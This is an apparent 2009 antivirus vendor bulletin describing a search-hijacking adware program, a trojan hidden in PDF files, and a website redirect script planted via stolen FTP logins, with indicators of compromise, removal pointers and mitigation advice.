Threat Spotlight for the week ending November 20, 2009
- Unwanted application changes search engine settings
- Trojan hides malicious code in fake PDF file
- Redirect script exploits weak FTP credentials to hijack websites
Read last week's Threat Spotlight
Unwanted application changes search engine settings
Potentially unwanted application: SearchSettings
| Who is at risk?: | Windows users |
| How to get rid of it: | If you've received an alert for a blocked PUA or adware and decide that the application is not suitable for your workplace, then follow the instructions for removing PUAs. |
About this threat:
SearchSettings is a potentially unwanted application (PUA) that redirects browser traffic. This includes changing the default search engine, address bar search and default error pages. SearchSettings may monitor these settings to protect them from being reset.
SearchSettings may be installed by third party toolbars, including Widgi Toolbar and Dealio.
SearchSettings usually installs files in the folder <Program Files>\Search Settings. It often then creates files such as these:
<Program Files>\Search Settings\SearchSettings.exe
<Program Files>\Search Settings\kb128\SearchSettings.dll
<Program Files>\Search Settings\kb128\SearchSettingsRes409.dll
The PUA sets this registry entry to start SearchSettings automatically on startup:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SearchSettings
<Program Files>\Search Settings\SearchSettings.exe
It also sets registry entries in these locations:
HKCU\Software\Search Settings
HKLM\SOFTWARE\Search Settings
HKCR\SearchSettings.BHO
HKCR\SearchSettings.BHO.1
HKCR\TypeLib\{CD082CCA-086F-4FD8-8FD7-247A0DBBD1CC}
HKCR\CLSID\{E312764E-7706-43F1-8DAB-FCDD2B1E416D}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper
Objects\{E312764E-7706-43F1-8DAB-FCDD2B1E416D}
Trojan hides malicious code in fake PDF file
Trojan: Troj/PDFJs-EF
| Also known as: |
|
| Who is at risk?: | Windows users with unpatched versions of Adobe Reader or Acrobat |
| How to get rid of it: | If you've received an alert for a virus or spyware, then follow the instructions for removing the threat. |
About this threat:
Troj/PDFJs-EF is a Trojan for the Windows platform that manifests itself as a compromised PDF document. This PDF file contains a malicious script hidden within the Trailer tag. The file also contains an additional layer of encryption to hide the malicious code from plain view. When executed, the script may attempt to initiate a download from a remote website.
Troj/PDFJs-EF usually arrives as a result of a PHP query from a compromised website or a malicious website.
SophosLabs analysts have noticed a marked increase this week of the use of this form of attack to target unsuspecting web users and strongly urged web users to update their Adobe Reader and Adobe Acrobat software.
Redirect script exploits weak FTP credentials to hijack websites
Trojan: Troj/JSRedir-AE
| Who is at risk?: | Windows users |
| How to get rid of it: | Please follow the instructions for removing Trojans. |
| For more information: | Gumblar revisited |
About this threat:
Troj/JSRedir-AE is a variant of the JSRedir family that attacks unsuspecting users of compromised websites. Criminals place Troj/JSRedir-AE onto a website using stolen upload credentials—usually FTP logins. The attack has two parts.
First, attackers upload a set of scripts to the compromised site. These scripts are written in PHP—detected as Troj/PHPMod-B—and are used to insert the additional scripting into web pages hosted on the server. They can also be used by attackers to remotely manage the infection, without further need for stolen FTP credentials.
Second, the scripts inserted into web pages—detected as Troj/JSRedir-AE—redirect visiting web browsers to other sites that host malicious content.
Troj/JSRedir has been used similarly in the past, notably during the Gumblar attack in May 2009.
SophosLabs recommend using a more secure protocol than FTP when uploading content to your web server, such as secure copy (SCP) or secure FTP (SFTP) with strong passwords.
Threat Spotlight archive:
For the week of: November 13, 2009
- Malicious email attachment hides spying malware
- Application modifies your default search engine
- Password-stealing worm targets online gamers
For the week of: November 6, 2009
- Fake anti-virus uses faux-legal contract to spur downloads
- IFrame-based attack redirects browsers to malware host sites
- Trojan takes advantage of Adobe Flash Player vulnerabilities
For the week of: October 30, 2009
- Trojan exploits Internet Explorer vulnerability to download malware
- Fake server upgrade messages disguise malware
- Malicious zip file poses as free Conficker scanner
For the week of: October 23, 2009
- Worm uses forged IRS messages to steal banking information
- E-card spam infects systems with fake anti-virus malware
- Unpatched Adobe Reader users vulnerable to Trojan attack
For the week of: October 8, 2009
- Spam-driven Trojan hawks fake anti-virus software
- Trojan diverts web surfers to fraudulent forums to sell pharma
- Fake anti-virus spreads via Twitter
For the week of: October 2, 2009
- Worm exploits Windows' Autorun feature to infect removable devices
- Network traffic sniffer steals your FTP credentials
- Email Trojan infects registry to pile on malware
For the week of: September 21, 2009
- Fake Firefox add-on Trojan spies on web activities
- Malware lures users to download fake anti-virus
- Malicious ads on New York Times website lead to Trojans
For the week of: September 18, 2009
- Malware spoofs threat alerts to force purchase of fake software
- Virus targets files within the Delphi compiler
- Facebook Fan Check virus scare leads to malware
